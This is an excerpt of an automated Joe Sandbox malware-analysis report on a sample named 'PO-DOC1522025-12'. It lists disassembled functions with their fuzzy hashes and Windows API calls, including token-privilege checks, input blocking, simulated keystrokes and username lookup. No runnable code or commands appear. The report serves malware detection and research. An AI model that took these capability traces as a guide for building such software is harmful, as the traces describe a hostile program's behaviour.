Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: aeb102ba6de4ef79fe641ec145d98cfacfa37c4674b577186dd8730ce9323df9
Instruction ID: ffefc15db580afc6e3d5c1be1b9d8d7ad316ed9ac9462a3dc20681e822a381aa
Opcode Fuzzy Hash: aeb102ba6de4ef79fe641ec145d98cfacfa37c4674b577186dd8730ce9323df9
Instruction Fuzzy Hash: EA113C75E06228BBDB148F99AC45FAFBBBCEB45B50F108516F908E7290D6704A058BA1

Function 001A1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001A168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001A16A1
FreeSid.ADVAPI32(?), ref: 001A16B1

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 65d880585bdf11a094556d211ec86fb8d43b94949b6c43823b8a6bae734b9254
Instruction ID: 74ecceacf4b9803e4b65106b4e7acee4883419c181fc15b77b789cdcd05e3f69
Opcode Fuzzy Hash: 65d880585bdf11a094556d211ec86fb8d43b94949b6c43823b8a6bae734b9254
Instruction Fuzzy Hash: 47F0F475952309FBDF00DFE49C89AAEBBBCFB08604F504965E501E2181E774AA44CA90

Function 00164CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(001728E9,?,00164CBE,001728E9,002088B8,0000000C,00164E15,001728E9,00000002,00000000,?,001728E9), ref: 00164D09
TerminateProcess.KERNEL32(00000000,?,00164CBE,001728E9,002088B8,0000000C,00164E15,001728E9,00000002,00000000,?,001728E9), ref: 00164D10
ExitProcess.KERNEL32 ref: 00164D22

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: c659413c85bebc965496659b0888e639e42f12162296d28bfb0d9f5f03e9bf31
Instruction ID: 8eb4d42b98b506fd8f863f45cb945d3d62c296a58e97778ee5cb531dfa3a4aae
Opcode Fuzzy Hash: c659413c85bebc965496659b0888e639e42f12162296d28bfb0d9f5f03e9bf31
Instruction Fuzzy Hash: D0E0B631402149BBCF11AF94DD09A583B69FB61782F108415FC198B522CB35DE92DA80

Function 0017C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0017C36C

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: fb8fb6cc299fb2f25afe35fb47c143a57b13983a342a5ec9a030bfc2de553a91
Instruction ID: ed3a48c8eeedf0dcaffc16e425551259084871958a9f441dbdd5b8ee32d0a667
Opcode Fuzzy Hash: fb8fb6cc299fb2f25afe35fb47c143a57b13983a342a5ec9a030bfc2de553a91
Instruction Fuzzy Hash: 3B412876500619ABCB249FB9DC49EAB77B8FB84314F10866DF909D7181E7709D81CB90

Function 0019D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0019D28C

Strings

X64, xrefs: 0019D2A8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 4679aca7d1abc07294e902dfdbdb84ec943f95fad2a82139104b8a946f8bdaf1
Instruction ID: bc0570dbce24718aea1d5b7ed4dda982ccd64425deb66a5418ab0114c171608b
Opcode Fuzzy Hash: 4679aca7d1abc07294e902dfdbdb84ec943f95fad2a82139104b8a946f8bdaf1
Instruction Fuzzy Hash: 72D0C9B480211DEACF94CB90EC88DDAB37CBB04305F100552F506A2080DB3095488F10

Function 0016CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: d74d4d19bb408f285b5ee52a8c8f45d19c558f8887941f339f9b4dca24924b09
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 53022C72E002199BDF14CFA9C8906ADFBF1EF88314F25816AD859E7380D731AA51CBD4

Function 0014CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#!, xrefs: 0014CF7F
Variable is not of type 'Object'., xrefs: 00190C40

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#!
API String ID: 0-498771827
Opcode ID: ac35c04d451672f7ca294451a9ffcbe41f61a361864a2287205d972760e5a9e1
Instruction ID: e8dfe3b64cb414df2e8e8dae16c5a54b5d9f002467c8934f60e3e23f2fc4d33b
Opcode Fuzzy Hash: ac35c04d451672f7ca294451a9ffcbe41f61a361864a2287205d972760e5a9e1
Instruction Fuzzy Hash: D632B174901218DFCF54DF94C885BEDB7B5FF19304F148069E806AB2A2DB35AE49CBA0

Function 001B68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001B6918
FindClose.KERNEL32(00000000), ref: 001B6961

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1d16ffce118e1468067dba131ccd6f7a345086399086b375b3089eeac4ec4858
Instruction ID: d1f0710eee54dd9bc7ccf6dc3a11a898b4b9315c57577081668337eb1a06d037
Opcode Fuzzy Hash: 1d16ffce118e1468067dba131ccd6f7a345086399086b375b3089eeac4ec4858
Instruction Fuzzy Hash: 2D11D0316042119FC710CF29D484A16BBE1FF94328F04C699F8698F6A2C734EC45CBD0

Function 001B37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001C4891,?,?,00000035,?), ref: 001B37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001C4891,?,?,00000035,?), ref: 001B37F4

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 09d7e91c2134af8cc24a4d8f8a07bebe194aa0faea35818476ffb5cc27c36c42
Instruction ID: 181431fb81d216e60e80ac6ff1e5fc00aaae73c626c95027e9948a3d0aa10a67
Opcode Fuzzy Hash: 09d7e91c2134af8cc24a4d8f8a07bebe194aa0faea35818476ffb5cc27c36c42
Instruction Fuzzy Hash: 31F0E5B16062297AE72027669C4DFEB3BAEEFC4761F000265F509D2291DB609944C7F0

Function 001AB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 001AB25D
keybd_event.USER32(?,7694C0D0,?,00000000), ref: 001AB270

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 3b7ce98068a06247dd9f966b8d21bc0a6e6b92df52350b43a21520c3ca3325cb
Instruction ID: 4b022e199f0c81c92a41e5a4c8c94218f43922c9c7b0bb9c2e2b28fbd7e14877
Opcode Fuzzy Hash: 3b7ce98068a06247dd9f966b8d21bc0a6e6b92df52350b43a21520c3ca3325cb
Instruction Fuzzy Hash: F9F0177590428EABDB059FA0C806BAE7BB4FF09309F00844AF965A61A2C3799651DF94

Function 001A10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001A11FC), ref: 001A10D4
CloseHandle.KERNEL32(?,?,001A11FC), ref: 001A10E9

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 5b7920a7a468b866be1bff67274dde659e00ae2e74062c5add7fb69120171a93
Instruction ID: abb4fa19f4c0f144d4f4190745f4a868e90c245555971a36b96474166b5bef9c
Opcode Fuzzy Hash: 5b7920a7a468b866be1bff67274dde659e00ae2e74062c5add7fb69120171a93
Instruction Fuzzy Hash: 17E04F72005601FEE7252B51FC06F7377A9EB04311F10882EF8A5844B1DB626CD0DB50

Function 0017676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00176766,?,?,00000008,?,?,0017FEFE,00000000), ref: 00176998

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 4c7ec43f57d194eb5991212e79e9231efe18bf36c56838513a315c1f787ebb02
Instruction ID: 6f000df0bcc62ea39bd610a19982691989ef2d069ab1d9db378187b5dbbd8306
Opcode Fuzzy Hash: 4c7ec43f57d194eb5991212e79e9231efe18bf36c56838513a315c1f787ebb02
Instruction Fuzzy Hash: 52B12931610A099FD719CF28C48AB657BB0FF45368F25C698E99DCF2A2C335E995CB40

Function 0015B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0019851F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c2c50ac9a83e1c4662e9f979807399735548f3383686bcb77786b98e00a1fb5c
Instruction ID: e91e4945e1bf1a2c3ba3518efafd517b3755ba2ce7726efc5cacc1ad85d88a15
Opcode Fuzzy Hash: c2c50ac9a83e1c4662e9f979807399735548f3383686bcb77786b98e00a1fb5c
Instruction Fuzzy Hash: 17126D71904229DFCF24CF58C880AEEB7F5FF48710F15819AE859EB255EB309A85CB90

Function 001BEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 001BEABD

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 743806e2cdeea054bb6eb6514c2eed248bdf92f90e5426142f7b363d25ddf5d9
Instruction ID: 0f2744a009a2816a044936346b9b7f75e2a311ab3303a78a654966337c58ec35
Opcode Fuzzy Hash: 743806e2cdeea054bb6eb6514c2eed248bdf92f90e5426142f7b363d25ddf5d9
Instruction Fuzzy Hash: 91E04F312012049FC710EF69D844EDAF7EDAFA8760F008816FC49CB3A1DB70E8408B90

Function 001609D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001603EE), ref: 001609DA

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8496916e2031d0d86dee912fa1534a16462d435cdd112a5848de3db6c116e6a2
Instruction ID: 53ee51feeaf869dc32dce88c387522920ce8648cae3afb2c0f42e35868e70501
Opcode Fuzzy Hash: 8496916e2031d0d86dee912fa1534a16462d435cdd112a5848de3db6c116e6a2
Instruction Fuzzy Hash:

Function 0016781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0016798B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 418aae584077b7f435f1242f9378701294227c45e8482d7e16ebf2a245c28f45
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 4D51777160C7059BDB3889788C5EBBE63DD9B2235CF180A09E882D72C2CB15EE71D356

Function 001B2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&!, xrefs: 001B2053

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID: 0&!
API String ID: 0-1419620344
Opcode ID: 43469d8c244f55b32967cbe7189211f24f8883fcc5b04a1932687fa1acc781e6
Instruction ID: f83aad06b7056ae799c8af964916890489c292ccbf61485bfdff114e1f6493c7
Opcode Fuzzy Hash: 43469d8c244f55b32967cbe7189211f24f8883fcc5b04a1932687fa1acc781e6
Instruction Fuzzy Hash: 7321A8326205158BD728CE79C8166BA73E5A764310F15862EF4A7C37D0DF35A908C740

Function 00176DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a18eb8aefda32e9f2cd9994f7d70d92970e4a52fbce395a90b4c2ae266b0437b
Instruction ID: 6300bcb1ee5865f4feafc62022c314af71245c680f04150fb822a920c4795eeb
Opcode Fuzzy Hash: a18eb8aefda32e9f2cd9994f7d70d92970e4a52fbce395a90b4c2ae266b0437b
Instruction Fuzzy Hash: 8932F022D29F414DD7239634CC72339A69DAFB73C5F15D727E81AB9DAAEB2984C34100

Function 0015CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c35bbaf75acc9f5407b43b23d9eac2dbb820a9f8bb7e1af56421969bd5092b1
Instruction ID: 2c93529c94911d5230de55de92e1e3da821f6e75faa36e66dfa8b187cc9ed387
Opcode Fuzzy Hash: 9c35bbaf75acc9f5407b43b23d9eac2dbb820a9f8bb7e1af56421969bd5092b1
Instruction Fuzzy Hash: 55324831A00255CFDF28CF68C4946BD7BA1EB45355F29816AD8EACB292E330DD85DBC1

Function 00147920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc6433cfb387cab9d1c474e6abdd2a26e8e80f127f44ecd8742fca969a933ea
Instruction ID: d8aece26733260cc8be88075c7a8c31e179b13d78f54f192c37b848b133ee278
Opcode Fuzzy Hash: 3fc6433cfb387cab9d1c474e6abdd2a26e8e80f127f44ecd8742fca969a933ea
Instruction Fuzzy Hash: E522A270A04609DFDF14DF64D881AAEB7F6FF54300F244529E816E72A1EB369E15CB50

Function 001491C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2527b258ba138ccec0412f3ca835983c944438fe8785663d61813bdfbdf78c4b
Instruction ID: 7a8b27500df56ac18505e8cb6a5a82c5d8080611502b77bee8000e3541fa717a
Opcode Fuzzy Hash: 2527b258ba138ccec0412f3ca835983c944438fe8785663d61813bdfbdf78c4b
Instruction Fuzzy Hash: 4C0295B1E00205EFDB04EF64D881AAEB7F5FF54300F118169E816DB291EB71AA65CF91

Function 00167A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
